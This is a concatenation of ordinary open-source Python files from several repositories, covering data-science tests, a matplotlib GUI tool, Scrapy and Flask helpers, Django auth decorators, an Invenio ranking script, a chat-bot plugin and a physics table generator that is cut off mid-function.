def tearDownClass(cls):
h2o.tear_down_cloud()
def test_expr_rpy2(self):
for k in range(20):
a = random.randint(1,10)
# b = random.randint(49,50)
b = random.randint(1,10)
c = random.randint(0,3)
for k in range(50):
execExpr = "a=" + str(h2o_eqns.Expression(a, b, c)) + ";"
(resultExec, hResult) = h2e.exec_expr(execExpr=execExpr)
print "h2o:", hResult
rResult = robjects.r(execExpr)[0]
print "R:", rResult
if math.isinf(rResult):
# covers pos/neg inf?
if not 'Infinity' in str(hResult):
raise Exception("h2o: %s R: %s not equal" % (hResult, rResult))
elif math.isnan(rResult):
if not 'NaN' in str(hResult):
raise Exception("h2o: %s R: %s not equal" % (hResult, rResult))
                elif 'Infinity' in str(hResult) or 'NaN' in str(hResult):
raise Exception("h2o: %s R: %s not equal" % (hResult, rResult))
else:
# skip Inf
# don't do logicals..h2o 1/0, R True/False
h2o_util.assertApproxEqual(rResult, hResult, tol=1e-12, msg='mismatch h2o/R expression result')
if __name__ == '__main__':
h2o.unit_main()
|
kkozarev/mwacme
|
refs/heads/master
|
MS_Inspect_menu_version/RectSelect.py
|
1
|
##########################################################################
############################## RectSelect ###############################
###########################################################################
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
import numpy as np
import copy
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, \
NavigationToolbar2TkAgg
from matplotlib.figure import Figure
import matplotlib.patches as patches
import sys
if sys.version_info[0] < 3:
import Tkinter as tk
else: # Python3
import tkinter as tk
class RectSelect:
"""
The class represents the rectangle selection tool
start and end are coordinate pairs (x,y)
The functions with names starting with __upd are the callback routines.
"""
def __init__(self, momPanel):
self.momPanel = momPanel # One of the plot windows (Panels)
self.fig = momPanel.fig
self.ax = momPanel.ax
self.patch = None
#self.sel = momPanel.sel # List of already selected points
def draw(self, start, end):
""" Draw the rectangle """
wid = end[0] - start[0]
hei = end[1] - start[1]
return patches.Rectangle(start, wid, hei, ec='k', fill=False, fc='c', \
ls='dashed', lw=0.7)
def autodraw(self, **opts):
""" Setup automatic drawing; supports command option """
self.start = None
# self.fig.canvas is momPanel.canvas
        # Keep the connection ids so that disconnect() can unregister the callbacks.
        self.cids = [
            self.fig.canvas.mpl_connect('button_press_event', self.__upd_press),
            self.fig.canvas.mpl_connect('motion_notify_event', self.__upd_motion),
            self.fig.canvas.mpl_connect('button_release_event', self.__upd_release),
            self.fig.canvas.mpl_connect('key_press_event', self.__upd_key),
        ]
#self._command = opts.pop('command', lambda *args: None)
#self.rectopts = opts
def __upd_key(self, event):
if event.key == 'esc':
if self.patch is not None:
self.patch.remove()
def __upd_press(self, event):
        if event.inaxes != self.ax: return # Beyond data window: ========= >>>
        if self.start is None:
x = event.xdata
y = event.ydata
            if x is not None and y is not None:
self.start = [x,y]
self.fig.canvas.show()
def __upd_motion(self, event):
        if event.inaxes != self.ax: return # Beyond data window: ========= >>>
if self.patch is not None:
self.patch.remove()
x = event.xdata
y = event.ydata
        if self.start is not None and x is not None and y is not None:
self.patch = self.draw(self.start, [x,y])
self.ax.add_artist(self.patch)
self.fig.canvas.show()
def __upd_release(self, event):
if self.patch is None: # return # Click without motion detected
return
mom = self.momPanel
extn = self.patch.get_bbox().extents
ex0, ey0, ex1, ey1 = extn
if self.patch is not None:
self.patch.remove() # Do not leave the dashed rectangle visible
self.start = None
self.patch = None
self.fig.canvas.show()
#
# Make the extents to be always in correct order:
# x0 < x1 and y0 < y1
#
x0 = ex0
x1 = ex1
if ex0 > ex1:
x0 = ex1
x1 = ex0
y0 = ey0
y1 = ey1
if ey0 > ey1:
y0 = ey1
y1 = ey0
#
# The graph points
#
x = mom.xdata[mom.Xscale][mom.Xkey]
y = mom.ydata[mom.Yscale][mom.Ykey]
#
# Find the graph points covered by the rectangle patch
#
sel = np.where((x >= x0) & (x <= x1) & (y >= y0) & (y <= y1))[0]
if len(sel) == 0:
return # =========== NO POINTS SELECTED =============== >>>
#
# Remove all the flagged data points from selection
#
sel = np.setdiff1d(sel, mom.iflag)
if len(sel) == 0:
return # =========== NO VALID POINTS ================== >>>
#
# Undo/Redo in kwrite editor style
#
# If the selection/unselection is made after one or more Undo,
# the history before the current state is wiped out and cannot
# be Redo-ne
## #
## # If iSelQueue points not at the last element of the selection queue:
## #
## if mom.iSelQueue < len(mom.selQueue) - 1:
## # Wipe after iSelQueue
## mom.selQueue = mom.selQueue[:mom.iSelQueue+1]
## mom.buttonRedo.config(state='disabled') # Gray out Redo
if mom.SelectingON:
#
# Exclude from sel the points already selected
#
if len(mom.sel) > 0:
sel = np.setdiff1d(sel, mom.sel)
if len(sel) == 0:
return # =============== NO NEW SELECTIONS =============== >>>
#
# If iSelQueue points not at the last element of the
# selection queue:
#
if mom.iSelQueue < len(mom.selQueue) - 1:
# Wipe after iSelQueue
mom.selQueue = mom.selQueue[:mom.iSelQueue+1]
mom.buttonRedo.config(state='disabled') # Gray out Redo
#
# We are here in case user selected some not yet selected points
#
# Append the new selection to the Undo/ReDo queue
#
mom.selQueue.append({0:'select', 1:copy.copy(sel)})
#
# At the very beginning, enable button Undo and option Save
#
if mom.iSelQueue == 0:
mom.buttonUndo.config(state='normal') # Enable Undo
mom.menuSelect.entryconfig(2, state='normal') # Enable Save
mom.iSelQueue = mom.iSelQueue + 1
#
# Add the just selected points to the self.sel list of the
            # mother panel keeping the unique points only
#
if len(mom.sel) > 0:
mom.sel = np.union1d(mom.sel, sel)
else:
mom.sel = sel
if mom.unSelectingON:
#
# Exclude from sel the points that are not selected
#
if len(mom.sel) == 0: # If there are no selected points at all,
sel = np.array([], dtype=np.int64) # The unselection is empty
else: # Otherwise unselect only those selected:
sel = np.intersect1d(mom.sel, sel) # Leave only common points
if len(sel) == 0:
return # =============== NO NEW SELECTIONS =============== >>>
#
# If iSelQueue points not at the last element of the
# selection queue:
#
if mom.iSelQueue < len(mom.selQueue) - 1:
# Wipe after iSelQueue
mom.selQueue = mom.selQueue[:mom.iSelQueue+1]
mom.buttonRedo.config(state='disabled') # Gray out Redo
#
# We are here in case user unselected some selected points
#
# Append the new UNselection to the Undo/ReDo queue
#
mom.selQueue.append({0:'unselect', 1:copy.copy(sel)})
#
# At the very beginning, enable button Undo and option Save
#
if mom.iSelQueue == 0:
mom.buttonUndo.config(state='normal') # Enable Undo
mom.menuSelect.entryconfig(2, state='normal') # Enable Save
mom.iSelQueue = mom.iSelQueue + 1
#
# Remove the just selected points from the self.sel list of the
# mother panel, keeping the unique points only
#
if len(mom.sel) > 0:
mom.sel = np.setdiff1d(mom.sel, sel)
else:
mom.sel = sel
mom.nsel = len(mom.sel)
if len(mom.sel) > 0:
#
# Find the new graph points to paint red
#
xsel = x[mom.sel]
ysel = y[mom.sel]
#
# Paint the selected points
#
if mom.plsel:
mom.plsel[0].remove() # Wipe out the red selected points
mom.plsel = mom.ax.plot(xsel, ysel, 'r.', ms=6.0, mew=0.1)
self.fig.canvas.show()
def disconnect(self):
# Note: mpl_disconnect expects the connection ids returned by mpl_connect;
# if anything else is passed, it silently does nothing.
self.fig.canvas.mpl_disconnect(self.__upd_press)
self.fig.canvas.mpl_disconnect(self.__upd_motion)
self.fig.canvas.mpl_disconnect(self.__upd_release)
self.fig.canvas.mpl_disconnect(self.__upd_key)
|
chekunkov/scrapy
|
refs/heads/master
|
scrapy/utils/response.py
|
28
|
"""
This module provides some useful functions for working with
scrapy.http.Response objects
"""
import os
import re
import weakref
import webbrowser
import tempfile
from twisted.web import http
from twisted.web.http import RESPONSES
from w3lib import html
from scrapy.http import HtmlResponse, TextResponse
from scrapy.utils.decorator import deprecated
@deprecated
def body_or_str(*a, **kw):
from scrapy.utils.iterators import _body_or_str
return _body_or_str(*a, **kw)
_baseurl_cache = weakref.WeakKeyDictionary()
def get_base_url(response):
"""Return the base url of the given response, joined with the response url"""
if response not in _baseurl_cache:
text = response.body_as_unicode()[0:4096]
_baseurl_cache[response] = html.get_base_url(text, response.url, \
response.encoding)
return _baseurl_cache[response]
_noscript_re = re.compile(u'<noscript>.*?</noscript>', re.IGNORECASE | re.DOTALL)
_script_re = re.compile(u'<script.*?>.*?</script>', re.IGNORECASE | re.DOTALL)
_metaref_cache = weakref.WeakKeyDictionary()
def get_meta_refresh(response):
"""Parse the http-equiv refrsh parameter from the given response"""
if response not in _metaref_cache:
text = response.body_as_unicode()[0:4096]
text = _noscript_re.sub(u'', text)
text = _script_re.sub(u'', text)
_metaref_cache[response] = html.get_meta_refresh(text, response.url, \
response.encoding)
return _metaref_cache[response]
def response_status_message(status):
"""Return status code plus status text descriptive message
>>> response_status_message(200)
'200 OK'
>>> response_status_message(404)
'404 Not Found'
"""
return '%s %s' % (status, http.responses.get(int(status)))
def response_httprepr(response):
"""Return raw HTTP representation (as string) of the given response. This
is provided only for reference, since it's not the exact stream of bytes
that was received (that's not exposed by Twisted).
"""
s = "HTTP/1.1 %d %s\r\n" % (response.status, RESPONSES.get(response.status, ''))
if response.headers:
s += response.headers.to_string() + "\r\n"
s += "\r\n"
s += response.body
return s
def open_in_browser(response, _openfunc=webbrowser.open):
"""Open the given response in a local web browser, populating the <base>
tag for external links to work
"""
# XXX: this implementation is a bit dirty and could be improved
body = response.body
if isinstance(response, HtmlResponse):
if '<base' not in body:
body = body.replace('<head>', '<head><base href="%s">' % response.url)
ext = '.html'
elif isinstance(response, TextResponse):
ext = '.txt'
else:
raise TypeError("Unsupported response type: %s" % \
response.__class__.__name__)
fd, fname = tempfile.mkstemp(ext)
os.write(fd, body)
os.close(fd)
return _openfunc("file://%s" % fname)
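# Example usage (a minimal sketch; the response below is built by hand purely
# for illustration):
#
# from scrapy.http import HtmlResponse
# resp = HtmlResponse(url="http://example.com/a/",
# body='<html><head><base href="/b/"></head><body></body></html>')
# get_base_url(resp) # -> "http://example.com/b/"
# response_status_message(404) # -> "404 Not Found"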
|
felix1m/knowledge-base
|
refs/heads/master
|
kb/factory.py
|
1
|
# -*- coding: utf-8 -*-
"""
kb.factory
~~~~~~~~~~~~~~~~
kb factory module
"""
import os
from flask import Flask
from flask_security import SQLAlchemyUserDatastore
from .core import db, mail, security, api_manager
from .helpers import register_blueprints
from .middleware import HTTPMethodOverrideMiddleware
from .models import User, Role
from .logger import setup_logging
def create_app(package_name, package_path, settings_override=None,
register_security_blueprint=True, create_api_manager=False):
"""Returns a :class:`Flask` application instance configured with common
functionality for the kb platform.
:param package_name: application package name
:param package_path: application package path
:param settings_override: a dictionary of settings to override
:param register_security_blueprint: flag to specify if the Flask-Security
Blueprint should be registered. Defaults
to `True`.
:param create_api_manager: flag to specify if the Flask-Restless API
manager should be initialized. Defaults to `False`.
"""
app = Flask(package_name, instance_relative_config=True)
app.config.from_object('kb.settings')
app.config.from_pyfile('settings.cfg', silent=True)
app.config.from_object(settings_override)
db.init_app(app)
mail.init_app(app)
security.init_app(app, SQLAlchemyUserDatastore(db, User, Role),
register_blueprint=register_security_blueprint)
if create_api_manager:
# Init the Flask-Restless API manager.
api_manager.init_app(app, flask_sqlalchemy_db=db)
register_blueprints(app, package_name, package_path)
app.wsgi_app = HTTPMethodOverrideMiddleware(app.wsgi_app)
if not app.debug:
setup_logging(app)
return app
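# Example usage (a sketch; ``kb.api`` is a hypothetical sub-package shown only
# to illustrate the call signature):
#
# from kb import api
# app = create_app(api.__name__, api.__path__, create_api_manager=True)
# app.run()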
|
yezhangxiang/blokus
|
refs/heads/master
|
generate_tensor.py
|
1
|
import json
import numpy as np
import matplotlib.pyplot as plt
import math
import os
import sys
from utility import process_file_list, show_channels
from multiway_tree import add_node, write_tree
from matrix2tensor import matrix2tensor
channel_size = 20
def json2tensor(json_file, chessman_dic, chessman_state_id, output_folder, is_show_tensor=False):
with open(json_file) as json_f:
file_name = os.path.basename(json_file)
sub_output_folder = os.path.join(output_folder, file_name)
if not os.path.exists(sub_output_folder):
os.makedirs(sub_output_folder)
label = {}
chessboard_player_id = np.zeros((channel_size, channel_size))
chessboard_chessman_id = np.zeros((channel_size, channel_size))
chessboard_hand_no = np.zeros((channel_size, channel_size))
for line in json_f:
start_index = line.find('{')
if start_index == -1:
continue
line_sub = line[start_index:]
msg = json.loads(line_sub)
if msg['msg_name'] == 'game_start':
pass
elif msg['msg_name'] == 'notification':
msg_data = msg['msg_data']
player_id = msg_data['player_id']
chessman = msg_data['chessman']
if 'id' not in chessman:
continue
chessman_id = chessman['id']
squareness = chessman['squareness']
hand_no = msg_data['hand']['no']
chessboard_player_id_regulated = regular_chessboard(chessboard_player_id, player_id,
is_replace_player_id=True)
chessboard_chessman_id_regulated = regular_chessboard(chessboard_chessman_id, player_id)
chessboard_hand_no_regulated = regular_chessboard(chessboard_hand_no, player_id)
for grid in squareness:
chessboard_player_id[grid['x']][grid['y']] = player_id
chessboard_chessman_id[grid['x']][grid['y']] = chessman_id
chessboard_hand_no[grid['x']][grid['y']] = hand_no
chessboard_player_id_regulated_new = regular_chessboard(chessboard_player_id, player_id,
is_replace_player_id=True)
chessman_in_board_regulated = chessboard_player_id_regulated_new - chessboard_player_id_regulated
squareness_regulated = chessman_in_board2squareness(chessman_in_board_regulated)
regular_chessman, regular_x, regular_y = squareness2regular_chessman(squareness_regulated)
state = find_chessman(chessman_dic[chessman_id], regular_chessman)
tensor = matrix2tensor(chessboard_player_id_regulated,
chessboard_chessman_id_regulated,
chessboard_hand_no_regulated)
show_channels(tensor, is_show_tensor, True)
tensor_save_file = os.path.join(sub_output_folder, str(hand_no) + '.npy')
np.save(tensor_save_file, tensor)
add_node(label, [player_id, tensor_save_file],
[chessman_id, state, regular_x, regular_y,
channel_size * regular_y + regular_x +
channel_size * channel_size * chessman_state_id[chessman_id][state]])
elif msg['msg_name'] == 'game_over':
if 'msg_data' not in msg:
continue
msg_data = msg['msg_data']
teams = msg_data['teams']
win_team = (teams[0] if teams[0]['score'] >= teams[1]['score'] else teams[1])
win_players = win_team['players']
win_players_id = [win_players[0]['player_id'], win_players[1]['player_id']]
if win_players_id[0] not in label or win_players_id[1] not in label:
continue
win_label = {win_players_id[0]: label[win_players_id[0]],
win_players_id[1]: label[win_players_id[1]]}
write_tree(win_label, os.path.join(sub_output_folder, 'win_label.csv'),
['player', 'filename', 'chessman', 'state', 'x', 'y', 'class'])
write_tree(label, os.path.join(sub_output_folder, 'label.csv'),
['player', 'filename', 'chessman', 'state', 'x', 'y', 'class'])
def regular_chessboard(chessboard, player_id, is_replace_player_id=False):
rot_k = player_id - 1
chessboard_regulated = chessboard.copy()
if is_replace_player_id:
chessboard_regulated = np.zeros((channel_size, channel_size))
for i in range(1, 5):
regular_id = (i - rot_k) % 4
if regular_id == 0:
regular_id = 4
chessboard_regulated[chessboard == i] = regular_id
chessboard_regulated = np.rot90(chessboard_regulated, rot_k)
return chessboard_regulated
def chessman_in_board2squareness(chessman_in_board):
squareness = []
for i in range(channel_size):
for j in range(channel_size):
if chessman_in_board[i][j] != 0:
squareness.append({'x': i, 'y': j})
return squareness
def squareness2regular_chessman(squareness):
x = [grid['x'] for grid in squareness]
y = [grid['y'] for grid in squareness]
x_min = min(x)
y_min = min(y)
x_regular = [x_i - x_min for x_i in x]
y_regular = [y_i - y_min for y_i in y]
chessman = np.zeros((max(x_regular) + 1, max(y_regular) + 1))
for i in range(len(x_regular)):
chessman[x_regular[i]][y_regular[i]] = 1
return chessman, x_min, y_min
def extend_all_chessman(is_show=False):
chessman_dic = {
101: [np.array([[1]])],
201: [np.array([[1, 1]])],
301: [np.array([[1, 1, 1]])],
302: [np.array([[1, 1], [1, 0]])],
401: [np.array([[1, 1, 1, 1]])],
402: [np.array([[0, 1, 0], [1, 1, 1]])],
403: [np.array([[1, 1, 0], [0, 1, 1]])],
404: [np.array([[1, 0, 0], [1, 1, 1]])],
405: [np.array([[1, 1], [1, 1]])],
501: [np.array([[1, 1, 1, 1, 1]])],
502: [np.array([[1, 1, 1], [0, 1, 0], [0, 1, 0]])],
503: [np.array([[0, 1, 0], [1, 1, 1], [0, 1, 0]])],
504: [np.array([[1, 0, 0], [1, 0, 0], [1, 1, 1]])],
505: [np.array([[0, 0, 1], [0, 1, 1], [1, 1, 0]])],
506: [np.array([[1, 1, 1], [0, 1, 1]])],
507: [np.array([[1, 1, 1, 1], [0, 1, 0, 0]])],
508: [np.array([[1, 0, 0, 0], [1, 1, 1, 1]])],
509: [np.array([[1, 1, 1], [1, 0, 1]])],
510: [np.array([[0, 0, 1, 1], [1, 1, 1, 0]])],
511: [np.array([[0, 1, 1], [0, 1, 0], [1, 1, 0]])],
512: [np.array([[1, 1, 0], [0, 1, 1], [0, 1, 0]])],
}
for name, chessman_list in chessman_dic.items():
chessman = chessman_list[0]
for i in range(8):
chessman = np.rot90(chessman, i)
if i == 4:
chessman = np.transpose(chessman)
if find_chessman(chessman_list, chessman) == -1:
chessman_list.append(chessman)
if is_show:
for name, chessman_list in chessman_dic.items():
channel_num = len(chessman_list)
row = int(math.sqrt(channel_num))
column = int(math.ceil(channel_num / row))
fig, axes = plt.subplots(row, column)
fig.canvas.set_window_title(str(name))
for i, chessman in enumerate(chessman_list):
cur_ax = axes if channel_num == 1 else axes[i] if channel_num < 3 else axes[
int(i / column), int(i % column)]
cur_ax.imshow(chessman)
plt.show()
return chessman_dic
def get_chessman_state_index(chessman_dic):
chessman_state_id = {}
chessman_state_id_inverse = {}
dic_sorted = sorted(chessman_dic.items(), key=lambda d: d[0])
index = 0
for item in dic_sorted:
name = item[0]
chessman_list = item[1]
for state, chessman_item in enumerate(chessman_list):
add_node(chessman_state_id, [name, state], index)
add_node(chessman_state_id_inverse, [index], [name, state])
index += 1
return chessman_state_id, chessman_state_id_inverse
def find_chessman(chessman_list, chessman):
for i, chessman_item in enumerate(chessman_list):
if chessman.shape == chessman_item.shape and np.sum(np.abs(chessman - chessman_item)) == 0:
return i
return -1
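# Quick check (a sketch): chessman 302 (the 3-square L piece) matches the
# orientation stored at index 0 of its list, so find_chessman returns 0.
#
# chessman_dic = extend_all_chessman()
# find_chessman(chessman_dic[302], np.array([[1, 1], [1, 0]])) # -> 0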
if __name__ == '__main__':
chessman_dic = extend_all_chessman()
chessman_state_id, _ = get_chessman_state_index(chessman_dic)
for argv_i in range(1, len(sys.argv), 2):
process_file_list(sys.argv[argv_i], json2tensor, True, chessman_dic, chessman_state_id, sys.argv[argv_i + 1],
False)
|
justintweaver/mtchi-cert-game
|
refs/heads/master
|
makahiki/apps/lib/django_cas/decorators.py
|
9
|
"""Replacement authentication decorators that work around redirection loops"""
try:
from functools import wraps
except ImportError:
from django.utils.functional import wraps
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.http import HttpResponseForbidden, HttpResponseRedirect
from django.utils.http import urlquote
__all__ = ['login_required', 'permission_required', 'user_passes_test']
def user_passes_test(test_func, login_url=None,
redirect_field_name=REDIRECT_FIELD_NAME):
"""Replacement for django.contrib.auth.decorators.user_passes_test that
returns 403 Forbidden if the user is already logged in.
"""
if not login_url:
from django.conf import settings
login_url = settings.LOGIN_URL
def decorator(view_func):
@wraps(view_func)
def wrapper(request, *args, **kwargs):
if test_func(request.user):
return view_func(request, *args, **kwargs)
elif request.user.is_authenticated():
return HttpResponseForbidden('<h1>Permission denied</h1>')
else:
path = '%s?%s=%s' % (login_url, redirect_field_name,
urlquote(request.get_full_path()))
return HttpResponseRedirect(path)
return wrapper
return decorator
def permission_required(perm, login_url=None):
"""Replacement for django.contrib.auth.decorators.permission_required that
returns 403 Forbidden if the user is already logged in.
"""
return user_passes_test(lambda u: u.has_perm(perm), login_url=login_url)
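# Example usage (a sketch; the view and the permission string are illustrative):
#
# @permission_required('polls.can_vote')
# def vote(request):
# ...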
|
ioannistsanaktsidis/invenio
|
refs/heads/prod
|
modules/bibrank/lib/bibrankgkb.py
|
25
|
## -*- mode: python; coding: utf-8; -*-
##
## This file is part of Invenio.
## Copyright (C) 2007, 2008, 2010, 2011 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""
Usage: bibrankgkb %s [options]
Examples:
bibrankgkb --input=bibrankgkb.cfg --output=test.kb
bibrankgkb -otest.kb -v9
bibrankgkb -v9
Generate options:
-i, --input=file input file, default from /etc/bibrank/bibrankgkb.cfg
-o, --output=file output file, will be placed in current folder
General options:
-h, --help print this help and exit
-V, --version print version and exit
-v, --verbose=LEVEL verbose level (from 0 to 9, default 1)
"""
__revision__ = "$Id$"
import getopt
import sys
import time
import re
import ConfigParser
from invenio.urlutils import make_invenio_opener
from invenio.config import CFG_ETCDIR
from invenio.dbquery import run_sql
BIBRANK_OPENER = make_invenio_opener('BibRank')
opts_dict = {}
task_id = -1
def bibrankgkb(config):
"""Generates a .kb file based on input from the configuration file"""
if opts_dict["verbose"] >= 1:
write_message("Running: Generate Knowledgebase.")
journals = {}
journal_src = {}
i = 0
#Reading the configuration file
while config.has_option("bibrankgkb","create_%s" % i):
cfg = config.get("bibrankgkb", "create_%s" % i).split(",,")
conv = {}
temp = {}
#Input source 1, either file, www or from db
if cfg[0] == "file":
conv = get_from_source(cfg[0], cfg[1])
del cfg[0:2]
elif cfg[0] == "www":
j = 0
urls = {}
while config.has_option("bibrankgkb", cfg[1] % j):
urls[j] = config.get("bibrankgkb", cfg[1] % j)
j = j + 1
conv = get_from_source(cfg[0], (urls, cfg[2]))
del cfg[0:3]
elif cfg[0] == "db":
conv = get_from_source(cfg[0], (cfg[1], cfg[2]))
del cfg[0:3]
if not conv:
del cfg[0:2]
else:
if opts_dict["verbose"] >= 9:
write_message("Using last resource for converting values.")
#Input source 2, either file, www or from db
if cfg[0] == "file":
temp = get_from_source(cfg[0], cfg[1])
elif cfg[0] == "www":
j = 0
urls = {}
while config.has_option("bibrankgkb", cfg[1] % j):
urls[j] = config.get("bibrankgkb", cfg[1] % j)
j = j + 1
temp = get_from_source(cfg[0], (urls, cfg[2]))
elif cfg[0] == "db":
temp = get_from_source(cfg[0], (cfg[1], cfg[2]))
i = i + 1
#If a conversion file is given, the names will be converted to the correct convention
if len(conv) != 0:
if opts_dict["verbose"] >= 9:
write_message("Converting between naming conventions given.")
temp = convert(conv, temp)
if len(journals) != 0:
for element in temp.keys():
if not journals.has_key(element):
journals[element] = temp[element]
else:
journals = temp
#Writing output file
if opts_dict["output"]:
f = open(opts_dict["output"], 'w')
f.write("#Created by %s\n" % __revision__)
f.write("#Sources:\n")
for key in journals.keys():
f.write("%s---%s\n" % (key, journals[key]))
f.close()
if opts_dict["verbose"] >= 9:
write_message("Output complete: %s" % opts_dict["output"])
write_message("Number of hits: %s" % len(journals))
if opts_dict["verbose"] >= 9:
write_message("Result:")
for key in journals.keys():
write_message("%s---%s" % (key, journals[key]))
write_message("Total nr of lines: %s" % len(journals))
def showtime(timeused):
if opts_dict["verbose"] >= 9:
write_message("Time used: %d second(s)." % timeused)
def get_from_source(type, data):
"""Read a source based on the input to the function"""
datastruct = {}
if type == "db":
jvalue = run_sql(data[0])
jname = dict(run_sql(data[1]))
if opts_dict["verbose"] >= 9:
write_message("Reading data from database using SQL statements:")
write_message(jvalue)
write_message(jname)
for key, value in jvalue:
if jname.has_key(key):
key2 = jname[key].strip()
datastruct[key2] = value
#print "%s---%s" % (key2, value)
elif type == "file":
input = open(data, 'r')
if opts_dict["verbose"] >= 9:
write_message("Reading data from file: %s" % data)
data = input.readlines()
datastruct = {}
for line in data:
#print line
if not line[0:1] == "#":
key = line.strip().split("---")[0].split()
value = line.strip().split("---")[1]
datastruct[key] = value
#print "%s---%s" % (key,value)
elif type == "www":
if opts_dict["verbose"] >= 9:
write_message("Reading data from www using regexp: %s" % data[1])
write_message("Reading data from url:")
for link in data[0].keys():
if opts_dict["verbose"] >= 9:
write_message(data[0][link])
page = BIBRANK_OPENER.open(data[0][link])
input = page.read()
#Using the regexp from config file
reg = re.compile(data[1])
iterator = re.finditer(reg, input)
for match in iterator:
if match.group("value"):
key = match.group("key").strip()
value = match.group("value").replace(",", ".")
datastruct[key] = value
if opts_dict["verbose"] == 9:
print "%s---%s" % (key, value)
return datastruct
def convert(convstruct, journals):
"""Converting between names"""
if len(convstruct) > 0 and len(journals) > 0:
invconvstruct = dict(map(lambda x: (x[1], x[0]), convstruct.items()))
tempjour = {}
for name in journals.keys():
if convstruct.has_key(name):
tempjour[convstruct[name]] = journals[name]
elif invconvstruct.has_key(name):
tempjour[name] = journals[name]
return tempjour
else:
return journals
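# Example (a sketch): with a conversion table mapping the names found in the
# source data onto the desired convention, the values are re-keyed accordingly.
#
# convert({"PHYSICAL REVIEW D": "Phys. Rev. D"}, {"PHYSICAL REVIEW D": "4.5"})
# # -> {"Phys. Rev. D": "4.5"}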
def write_message(msg, stream = sys.stdout):
"""Write message and flush output stream (may be sys.stdout or sys.stderr). Useful for debugging stuff."""
if stream == sys.stdout or stream == sys.stderr:
stream.write(time.strftime("%Y-%m-%d %H:%M:%S --> ", time.localtime()))
try:
stream.write("%s\n" % msg)
except UnicodeEncodeError:
stream.write("%s\n" % msg.encode('ascii', 'backslashreplace'))
stream.flush()
else:
sys.stderr.write("Unknown stream %s. [must be sys.stdout or sys.stderr]\n" % stream)
return
def usage(code, msg=''):
"Prints usage for this module."
if msg:
sys.stderr.write("Error: %s.\n" % msg)
print >> sys.stderr, \
""" Usage: %s [options]
Examples:
%s --input=bibrankgkb.cfg --output=test.kb
%s -otest.kb -v9
%s -v9
Generate options:
-i, --input=file input file, default from /etc/bibrank/bibrankgkb.cfg
-o, --output=file output file, will be placed in current folder
General options:
-h, --help print this help and exit
-V, --version print version and exit
-v, --verbose=LEVEL verbose level (from 0 to 9, default 1)
""" % ((sys.argv[0],) * 4)
sys.exit(code)
def command_line():
global opts_dict
long_flags = ["input=", "output=", "help", "version", "verbose="]
short_flags = "i:o:hVv:"
format_string = "%Y-%m-%d %H:%M:%S"
sleeptime = ""
try:
opts, args = getopt.getopt(sys.argv[1:], short_flags, long_flags)
except getopt.GetoptError, err:
write_message(err, sys.stderr)
usage(1)
if args:
usage(1)
opts_dict = {"input": "%s/bibrank/bibrankgkb.cfg" % CFG_ETCDIR, "output":"", "verbose":1}
sched_time = time.strftime(format_string)
user = ""
try:
for opt in opts:
if opt == ("-h","") or opt == ("--help",""):
usage(1)
elif opt == ("-V","") or opt == ("--version",""):
print __revision__
sys.exit(1)
elif opt[0] in ["--input", "-i"]:
opts_dict["input"] = opt[1]
elif opt[0] in ["--output", "-o"]:
opts_dict["output"] = opt[1]
elif opt[0] in ["--verbose", "-v"]:
opts_dict["verbose"] = int(opt[1])
else:
usage(1)
startCreate = time.time()
file = opts_dict["input"]
config = ConfigParser.ConfigParser()
config.readfp(open(file))
bibrankgkb(config)
if opts_dict["verbose"] >= 9:
showtime((time.time() - startCreate))
except StandardError, e:
write_message(e, sys.stderr)
sys.exit(1)
return
def main():
command_line()
if __name__ == "__main__":
main()
|
JacobCallahan/CloudBot
|
refs/heads/master
|
plugins/eightball.py
|
35
|
import os
import asyncio
import codecs
import random
from cloudbot import hook
from cloudbot.util import colors
@hook.on_start()
def load_responses(bot):
path = os.path.join(bot.data_dir, "8ball_responses.txt")
global responses
with codecs.open(path, encoding="utf-8") as f:
responses = [line.strip() for line in
f.readlines() if not line.startswith("//")]
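# A sketch of the expected responses file (one reply per line, '//' lines ignored):
#
# // comments start with //
# It is certain.
# Ask again later.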
@asyncio.coroutine
@hook.command("8ball", "8", "eightball")
def eightball(action):
"""<question> - asks the all knowing magic electronic eight ball <question>"""
magic = random.choice(responses)
message = colors.parse("shakes the magic 8 ball... {}".format(magic))
action(message)
|
lkostler/AME60649_project_final
|
refs/heads/master
|
moltemplate/moltemplate/examples/coarse_grained_examples/protein_folding_examples/1bead+chaperone/frustrated+minichaperone/moltemplate_files/generate_tables/calc_chaperone_table.py
|
90
|
#!/usr/bin/env python
# Calculate a table of pairwise energies and forces between atoms in the
# protein and a chaperone provided in the supplemental materials section of:
# AI Jewett, A Baumketner and J-E Shea, PNAS, 101 (36), 13192-13197, (2004)
# This is stored in a tabulated force field with a singularity at a distance R.
#
# To calculate the table for interaction between
# ...the chaperone and a hydrophobic bead (2004 PNAS paper), use this table:
# ./calc_chaperone_table.py 1.0 1.0 6.0 0.475 0.0 5.9 1181
# ...the chaperone and a hydrophilic bead (2004 PNAS paper), use this table:
# ./calc_chaperone_table.py 1.0 1.0 6.0 0.0 0.0 5.9 1181
# ...the chaperone and a hydrophobic bead (2006 JMB paper), use this table:
# ./calc_chaperone_table.py 1.0 1.0 3.0 0.60 3.1 8.0 981 True
# ...the chaperone and a hydrophilic bead (2006 JMB paper), use this table:
# ./calc_chaperone_table.py 1.0 1.0 3.0 0.0 3.1 8.0 981 True
from math import *
import sys
def U(r, eps, sigma, R, h):
#print('r='+str(r)+' eps='+str(eps)+' s='+str(sigma)+' R='+str(R)+' h='+str(h))
# Formula is undefined at r=0, but you can take the limit:
if r <= 0:
return 4.0*pi*R*R*4.0*eps*(pow((sigma/R), 12.0)
- h*pow((sigma/R), 6.0))
xp = sigma/(r+R)
xm = sigma/(r-R)
term10 = pow(xm, 10.0) - pow(xp, 10.0)
term4 = pow(xm, 4.0) - pow(xp, 4.0)
return 4.0*pi*eps*(R/r) * (0.2*term10 - 0.5*h*term4)
def F(r, eps, sigma, R, h):
# Formula is undefined at r=0, but you can take the limit:
if r <= 0:
return 0.0
product_term_a = U(r, eps, sigma, R, h) / r
ixp = (r+R)/sigma
